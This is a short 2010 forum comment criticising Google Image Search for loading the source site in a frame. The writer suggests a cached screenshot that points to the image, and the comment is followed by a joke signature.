  • by vuo ( 156163 ) on Thursday February 04, 2010 @04:41PM (#31027416) Homepage

    I never understood why Google wants to load the site as a frame, which is unimaginably distracting and often the image is difficult to find. Rather, if they took a screenshot into the cache and moved the cursor automatically to the image, then it'd be more convenient, more reliable and safer.

No spitting on the Bus! Thank you, The Mgt.

Working...